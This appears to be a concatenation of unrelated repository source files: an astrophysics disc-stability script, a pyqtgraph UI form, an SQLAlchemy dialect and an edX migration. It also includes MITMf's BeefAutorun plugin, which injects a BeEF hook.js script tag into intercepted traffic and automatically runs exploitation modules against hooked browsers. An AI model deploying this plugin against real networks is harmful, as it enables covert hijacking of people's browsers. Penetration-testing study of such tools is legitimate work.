mainf(PATH=path+'/HALF_MAX',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=maxDisc,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='HALF',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=2)
renameFilesByMethod(path+'/HALF_MAX/', 'HALF_MAX')
if not os.path.exists(path+'/HALF_IBAND/'):
os.makedirs(path+'/HALF_IBAND/')
else:
for f in os.listdir(path+'/HALF_IBAND/'):
os.remove(path+'/HALF_IBAND/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/HALF_IBAND/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/HALF_IBAND/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/HALF_IBAND/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/HALF_IBAND/v_stars_mi.dat')
# HALF and I-band
mainf(PATH=path+'/HALF_IBAND',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=M_to_L,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='HALF',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=3)
renameFilesByMethod(path+'/HALF_IBAND/', 'HALF_IBAND')
if not os.path.exists(path+'/EQUAL_MAX/'):
os.makedirs(path+'/EQUAL_MAX/')
else:
for f in os.listdir(path+'/EQUAL_MAX/'):
os.remove(path+'/EQUAL_MAX/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/EQUAL_MAX/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/EQUAL_MAX/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/EQUAL_MAX/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/EQUAL_MAX/v_stars_mi.dat')
# EQUAL and maximum disc
mainf(PATH=path+'/EQUAL_MAX',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=maxDisc,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='EQUAL',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=4)
renameFilesByMethod(path+'/EQUAL_MAX/', 'EQUAL_MAX')
if not os.path.exists(path+'/AD_MAX/'):
os.makedirs(path+'/AD_MAX/')
else:
for f in os.listdir(path+'/AD_MAX/'):
os.remove(path+'/AD_MAX/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/AD_MAX/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/AD_MAX/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/AD_MAX/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/AD_MAX/v_stars_mi.dat')
# AD and maximum disc
mainf(PATH=path+'/AD_MAX',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=maxDisc,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='AD',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=5)
renameFilesByMethod(path+'/AD_MAX/', 'AD_MAX')
if not os.path.exists(path+'/AD_IBAND/'):
os.makedirs(path+'/AD_IBAND/')
else:
for f in os.listdir(path+'/AD_IBAND/'):
os.remove(path+'/AD_IBAND/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/AD_IBAND/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/AD_IBAND/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/AD_IBAND/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/AD_IBAND/v_stars_mi.dat')
# AD and I-band
mainf(PATH=path+'/AD_IBAND',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=M_to_L,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='AD',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=6)
renameFilesByMethod(path+'/AD_IBAND/', 'AD_IBAND')
##
# # Log output to a file
# sys.stdout = Tee(path + "/log_" + name + '.txt', 'w')
#
# # Work with the I-band photometry - two discs.
# poly_star, poly_gas, star_data, gas_data = bendStarRC(correctGasData, correctStarData, path, incl, 0.0, False,
# pol_degree_star, pol_degree_gas, name,
# scale, gas_corr_by_incl, False)
# h_disc *= scale
# R1, R2 = correctDistanceInterval(path, scale)
# R2 = 121
# evaluateSigLosWingsExpScale(path, r_eff_bulge)
# sigLosGaussParams, sigMajData = fitGaussSigLosMaj(correctSigmaLosMaj, path, scale, incl)
# sigLosPolyParams = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, False, min(Rmax, R2))
# sigLosSinhParams = fitSechSigLosMaj(correctSigmaLosMaj, path, scale, incl)
# sigLosGaussParamsMi, sigMiData = fitGaussSigLosMin(correctSigmaLosMin, path, scale, incl)
# sigLosPolyParamsMi = fitPolySigLosMin(correctSigmaLosMin, path, scale, incl, sig_pol_deg_mi, False, min(Rmax, R2))
# eval_SigPhi_to_sigR(poly_star, R1, R2, (R2 - R1) / 1000.0, path)
# evalEpyciclicFreq(poly_gas, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
# #M_to_L = mass_to_light_Iband(M_B - M_R)
# print '#!!!!!!!!!!!!# Mass-to-light ratio in I band (M/L) = ', M_to_L
# plotSurfDensForTwoDiscs(M_to_L, h_1, mu_1_I, h_2, mu_2_I, 0, Rmax, 0.1, path)
# gas_sf_data = surfaceDensityGas(path)
#
# r_surfd_gas = gas_sf_data[0]
# r_star_and_gas = list(arange(Rmin, Rmax, 0.1)) + r_surfd_gas
# r_star_and_gas.sort()
# # r_star_and_gas = filter(lambda x: ((x <= Rmax) & (x >= Rmin)), r_star_and_gas)
# # r_surfd_gas = filter(lambda x: ((x <= min(Rmax, R2)) & (x >= max(Rmin, R1, r_eff_bulge))), r_surfd_gas)
# r_star_and_gas = filter(lambda x: x > r_eff_bulge, r_star_and_gas)
# r_surfd_gas = filter(lambda x: x > r_eff_bulge, r_surfd_gas)
#
# h_kin, sigR2 = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star, poly_gas, 90)
# sigZ2, sigPhi2 = velosityEllipsoid(h_disc, r_star_and_gas, sigR2, path, incl, sigLosPolyParams, poly_star)
#
#
# # Solve the gravitational instability for the points where gas density data are available
# star_density = [surfaceDensityStarForTwoDiscs(M_to_L, h_1, mu_1_I, h_2, mu_2_I, R) for R in r_surfd_gas]
# gas_density = [gas_sf_data[1][gas_sf_data[0].index(R)] for R in r_surfd_gas]
# sigma_corr_gas = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin, poly_star, poly_gas)) for R in r_surfd_gas]
# Qeffs = findTwoFluidQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path, resolution, 60.0)
# hydroQeffs = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, 60.0)
# hzGas = [zGas(R[1], R[2], resolution) / 2 for R in zip(r_surfd_gas, star_density, gas_density)]
# sigmaZgas = [math.sqrt(sigZ2Evaluation(R, h_disc, h_kin, poly_star, poly_gas, incl, sigLosPolyParams)) for R in
# r_surfd_gas]
# hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_surfd_gas, star_density, gas_density, sigmaZgas)]
# plotVerticalScale(star_density, gas_density, resolution, sigmaZgas, r_surfd_gas, path)
# discQeffs = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, hzStar, hzGas, 60.0)
# Qeffs1F = findOneFluidQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path, resolution,
# 60.0)
#
# # Check how halving the disc thickness affects the results.
# hzStar = [hzs / 2 for hzs in hzStar]
# discQeffs_3 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, hzStar, hzGas, 60.0)
# # Check the results for a uniformly thick disc of 0.2h
# hzStar = [0.1 * h_disc] * r_surfd_gas.__len__()
# discQeffs_4 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, hzStar, hzGas, 60.0)
#
#
# # The same for a different inclination angle - to understand the dependence on the angle
# incl = incl + di
#
# poly_star1, poly_gas1, star_data1, gas_data1 = bendStarRC(correctGasData, correctStarData, path, incl, 0.0, False,
# pol_degree_star, pol_degree_gas, name,
# scale, gas_corr_by_incl, False)
# sigLosPolyParams1 = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, False, min(Rmax, R2))
# eval_SigPhi_to_sigR(poly_star1, R1, R2, 0.1, path)
# evalEpyciclicFreq(poly_gas1, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
# h_kin_1, sigR2_1 = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star1, poly_gas1, 90)
# sigZ2_1, sigPhi2_1 = velosityEllipsoid(h_disc, r_star_and_gas, sigR2_1, path, incl, sigLosPolyParams1, poly_star1)
# sigma_corr_gas_1 = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin_1, poly_star1, poly_gas1)) for R in r_surfd_gas]
# Qeffs_1 = findTwoFluidQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path, resolution,
# 60.0)
# hydroQeffs_1 = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path,
# resolution, 60.0)
# sigmaZgas = [math.sqrt(sigZ2Evaluation(R, h_disc, h_kin_1, poly_star1, poly_gas1, incl, sigLosPolyParams1)) for R in
# r_surfd_gas]
# hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_surfd_gas, star_density, gas_density, sigmaZgas)]
# discQeffs_1 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path,
# resolution, hzStar, hzGas, 60.0)
# Qeffs1F_1 = findOneFluidQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path, resolution,
# 60.0)
#
# # The same for another inclination
# incl = incl - 2 * di
#
# poly_star2, poly_gas2, star_data2, gas_data2 = bendStarRC(correctGasData, correctStarData, path, incl, 0.0, False,
# pol_degree_star, pol_degree_gas, name,
# scale, gas_corr_by_incl, False)
# sigLosPolyParams2 = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, False, min(Rmax, R2))
# eval_SigPhi_to_sigR(poly_star2, R1, R2, 0.1, path)
# evalEpyciclicFreq(poly_gas2, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
# h_kin_2, sigR2_2 = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star2, poly_gas2, 90)
# sigZ2_2, sigPhi2_2 = velosityEllipsoid(h_disc, r_star_and_gas, sigR2_2, path, incl, sigLosPolyParams2, poly_star2)
# sigma_corr_gas_2 = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin_2, poly_star2, poly_gas2)) for R in r_surfd_gas]
# Qeffs_2 = findTwoFluidQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path, resolution,
# 60.0)
# hydroQeffs_2 = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path,
# resolution, 60.0)
# sigmaZgas = [math.sqrt(sigZ2Evaluation(R, h_disc, h_kin_2, poly_star2, poly_gas2, incl, sigLosPolyParams2)) for R in
# r_surfd_gas]
# hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_surfd_gas, star_density, gas_density, sigmaZgas)]
# discQeffs_2 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path,
# resolution, hzStar, hzGas, 60.0)
# Qeffs1F_2 = findOneFluidQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path, resolution,
# 60.0)
#
# # Monte Carlo realizations, monte_carlo_realizations of them.
#
# incl = incl + di
# sigR2_list = [sigR2]
# sigZ2_list = [sigZ2]
# sigPhi2_list = [sigPhi2]
# Qeffs_list = [zip(*Qeffs)[2]]
# hydroQeffs_list = [zip(*hydroQeffs)[2]]
# discQeffs_list = [zip(*discQeffs)[2]]
# Qeffs1F_list = [Qeffs1F]
# MC_iter = 1
#
## while MC_iter < monte_carlo_realizations:
## MC_iter += 1
## print '#!!!!!!!!!!!!# Monte-Carlo iterration number ', MC_iter
## poly_star_mc, poly_gas_mc, star_data_mc, gas_data_mc = bendStarRC(correctGasData, correctStarData, path, incl,
## 0.0, False, pol_degree_star, pol_degree_gas, name,
## scale, gas_corr_by_incl, True)
## sigLosPolyParams_mc = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, True, min(Rmax, R2))
## eval_SigPhi_to_sigR(poly_star_mc, R1, R2, 0.1, path)
## evalEpyciclicFreq(poly_gas_mc, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
## h_kin_mc, sigR2_mc = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star_mc, poly_gas_mc, 90)
## sigZ2_mc, sigPhi2_mc = velosityEllipsoid(h_disc, r_star_and_gas, sigR2, path, incl, sigLosPolyParams_mc,
## poly_star_mc)
## sigma_corr_gas_mc = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin_mc, poly_star_mc, poly_gas_mc)) for R in
## r_surfd_gas]
## Qeffs_mc = findTwoFluidQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc, path,
## resolution, 60.0)
## hydroQeffs_mc = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc,
## path,
## resolution, 60.0)
## sigmaZgas_mc = [
## math.sqrt(sigZ2Evaluation(R, h_disc, h_kin_mc, poly_star_mc, poly_gas_mc, incl, sigLosPolyParams_mc)) for R in
## r_surfd_gas]
## hzStar_mc = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in
## zip(r_surfd_gas, star_density, gas_density, sigmaZgas_mc)]
## discQeffs_mc = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc,
## path,
## resolution, hzStar_mc, hzGas, 60.0)
## Qeffs1F_mc = findOneFluidQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc, path,
## resolution,
## 60.0)
## sigR2_list.append(sigR2_mc)
## sigZ2_list.append(sigZ2_mc)
## sigPhi2_list.append(sigPhi2_mc)
## Qeffs_list.append(zip(*Qeffs_mc)[2])
## hydroQeffs_list.append(zip(*hydroQeffs_mc)[2])
## discQeffs_list.append(zip(*discQeffs_mc)[2])
## Qeffs1F_list.append(Qeffs1F_mc)
#
# plotFinalPics(path, poly_star, poly_gas, di, star_data, gas_data, incl, resolution, h_disc, r_eff_bulge,
# sigMajData, sigLosGaussParams, sigLosPolyParams, sigLosSinhParams, r_surfd_gas,
# zip(Qeffs1F, Qeffs1F_1, Qeffs1F_2) + Qeffs1F_list,
# zip(zip(*hydroQeffs)[2], zip(*hydroQeffs_1)[2], zip(*hydroQeffs_2)[2]) + hydroQeffs_list,
# zip(zip(*Qeffs)[2], zip(*Qeffs_1)[2], zip(*Qeffs_2)[2]) + Qeffs_list,
# zip(zip(*discQeffs)[2], zip(*discQeffs_1)[2], zip(*discQeffs_2)[2], zip(*discQeffs_3)[2], zip(*discQeffs_4)[2])
# + discQeffs_list,
# r_star_and_gas,
# zip(sigR2, sigR2_1, sigR2_2) + sigR2_list,
# zip(sigPhi2, sigPhi2_1, sigPhi2_2) + sigPhi2_list,
# zip(sigZ2, sigZ2_1, sigZ2_2) + sigZ2_list,
# hzStar, peculiarities, 1)
# plt.show()
finishTime = time.time()
print '#!!!!!!!!!!!!# Time total: ', (finishTime - startTime), 's'
print '#!!!!!!!!!!!!# THE END'
|
JenSte/pyqtgraph
|
refs/heads/develop
|
pyqtgraph/canvas/TransformGuiTemplate_pyqt5.py
|
30
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './pyqtgraph/canvas/TransformGuiTemplate.ui'
#
# Created: Wed Mar 26 15:09:28 2014
# by: PyQt5 UI code generator 5.0.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(224, 117)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())
Form.setSizePolicy(sizePolicy)
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setSpacing(1)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.translateLabel = QtWidgets.QLabel(Form)
self.translateLabel.setObjectName("translateLabel")
self.verticalLayout.addWidget(self.translateLabel)
self.rotateLabel = QtWidgets.QLabel(Form)
self.rotateLabel.setObjectName("rotateLabel")
self.verticalLayout.addWidget(self.rotateLabel)
self.scaleLabel = QtWidgets.QLabel(Form)
self.scaleLabel.setObjectName("scaleLabel")
self.verticalLayout.addWidget(self.scaleLabel)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.mirrorImageBtn = QtWidgets.QPushButton(Form)
self.mirrorImageBtn.setToolTip("")
self.mirrorImageBtn.setObjectName("mirrorImageBtn")
self.horizontalLayout.addWidget(self.mirrorImageBtn)
self.reflectImageBtn = QtWidgets.QPushButton(Form)
self.reflectImageBtn.setObjectName("reflectImageBtn")
self.horizontalLayout.addWidget(self.reflectImageBtn)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.translateLabel.setText(_translate("Form", "Translate:"))
self.rotateLabel.setText(_translate("Form", "Rotate:"))
self.scaleLabel.setText(_translate("Form", "Scale:"))
self.mirrorImageBtn.setText(_translate("Form", "Mirror"))
self.reflectImageBtn.setText(_translate("Form", "Reflect"))
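# Usage sketch (the standard pattern for pyuic-generated classes; not part of
# the generated file):
#
#     app = QtWidgets.QApplication([])
#     widget = QtWidgets.QWidget()
#     ui = Ui_Form()
#     ui.setupUi(widget)
#     widget.show()
#     app.exec_()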
|
0x0mar/MITMf
|
refs/heads/master
|
plugins/BeefAutorun.py
|
1
|
from plugins.plugin import Plugin
from plugins.Inject import Inject
from time import sleep
import sys
import json
import threading
import logging
import libs.beefapi as beefapi
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
has_opts = True
desc = "Injects BeEF hooks & autoruns modules based on Browser or OS type"
def initialize(self, options):
self.options = options
self.autoruncfg = options.autoruncfg
self.hookip = options.hookip
self.beefip = options.beefip
self.beefport = options.beefport
self.beefuser = options.beefuser
self.beefpass = options.beefpass
self.dis_inject = options.dis_inject
beef = beefapi.BeefAPI({"host": self.beefip, "port": self.beefport})
if beef.login(self.beefuser, self.beefpass):
print "[*] Successfully logged in to BeEF"
else:
sys.exit("[-] Error logging in to BeEF!")
userconfig = ConfigObj(self.autoruncfg)
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
self.Targeted_modules = userconfig["targets"]
if self.dis_inject:
if not self.hookip:
sys.exit("[-] BeEFAutorun requires --hookip")
Inject.initialize(self, options)
self.count_limit = 1
self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.hookip, self.beefport)
print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
t.setDaemon(True)
t.start()
def autorun(self, beef):
already_ran = []
already_hooked = []
while True:
sessions = beef.sessions_online()
if len(sessions) > 0:
for session in sessions:
if session not in already_hooked:
info = beef.hook_info(session)
logging.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
already_hooked.append(session)
if self.Mode == 'oneshot':
if session not in already_ran:
self.execModules(session, beef)
already_ran.append(session)
elif self.Mode == 'loop':
self.execModules(session, beef)
sleep(10)
else:
sleep(1)
def execModules(self, session, beef):
session_info = beef.hook_info(session)
session_ip = session_info['ip']
hook_browser = session_info['name']
hook_os = session_info['os']
if len(self.All_modules) > 0:
logging.info("%s >> sending generic modules" % session_ip)
for module, options in self.All_modules.items():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
logging.info('%s >> sent module %s' % (session_ip, mod_id))
else:
logging.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)
logging.info("%s >> sending targeted modules" % session_ip)
for os in self.Targeted_modules:
if (os in hook_os) or (os == hook_os):
browsers = self.Targeted_modules[os]
if len(browsers) > 0:
for browser in browsers:
if browser == hook_browser:
modules = self.Targeted_modules[os][browser]
if len(modules) > 0:
for module, options in modules.items():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
logging.info('%s >> sent module %s' % (session_ip, mod_id))
else:
logging.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)
def add_options(self, options):
options.add_argument('--hookip', dest='hookip', help="Hook IP")
options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
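# Sketch of the expected beefautorun.cfg layout, inferred from the keys read in
# initialize() above (the module names and option strings are illustrative, not
# taken from the original project):
#
#     mode = oneshot                      # or "loop"
#     [ALL]
#         "Some BeEF Module" = '{}'
#     [targets]
#         [[Windows 7]]
#             [[[Firefox]]]
#                 "Another BeEF Module" = '{"option": "value"}'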
|
jackkiej/SickRage
|
refs/heads/master
|
lib/sqlalchemy/dialects/postgresql/zxjdbc.py
|
79
|
# postgresql/zxjdbc.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: postgresql+zxjdbc
:name: zxJDBC for Jython
:dbapi: zxjdbc
:connectstring: postgresql+zxjdbc://scott:tiger@localhost/db
:driverurl: http://jdbc.postgresql.org/
"""
from ...connectors.zxJDBC import ZxJDBCConnector
from .base import PGDialect, PGExecutionContext
class PGExecutionContext_zxjdbc(PGExecutionContext):
def create_cursor(self):
cursor = self._dbapi_connection.cursor()
cursor.datahandler = self.dialect.DataHandler(cursor.datahandler)
return cursor
class PGDialect_zxjdbc(ZxJDBCConnector, PGDialect):
jdbc_db_name = 'postgresql'
jdbc_driver_name = 'org.postgresql.Driver'
execution_ctx_cls = PGExecutionContext_zxjdbc
supports_native_decimal = True
def __init__(self, *args, **kwargs):
super(PGDialect_zxjdbc, self).__init__(*args, **kwargs)
from com.ziclix.python.sql.handler import PostgresqlDataHandler
self.DataHandler = PostgresqlDataHandler
def _get_server_version_info(self, connection):
parts = connection.connection.dbversion.split('.')
return tuple(int(x) for x in parts)
dialect = PGDialect_zxjdbc
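# Usage sketch (under Jython with the PostgreSQL JDBC driver on the classpath;
# the URL format is the one documented in the dialect docstring above):
#
#     from sqlalchemy import create_engine
#     engine = create_engine('postgresql+zxjdbc://scott:tiger@localhost/db')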
|
benpatterson/edx-platform
|
refs/heads/master
|
lms/djangoapps/licenses/migrations/0001_initial.py
|
188
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CourseSoftware'
db.create_table('licenses_coursesoftware', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('full_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('url', self.gf('django.db.models.fields.CharField')(max_length=255)),
('course_id', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('licenses', ['CourseSoftware'])
# Adding model 'UserLicense'
db.create_table('licenses_userlicense', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('software', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['licenses.CourseSoftware'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('serial', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('licenses', ['UserLicense'])
def backwards(self, orm):
# Deleting model 'CourseSoftware'
db.delete_table('licenses_coursesoftware')
# Deleting model 'UserLicense'
db.delete_table('licenses_userlicense')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
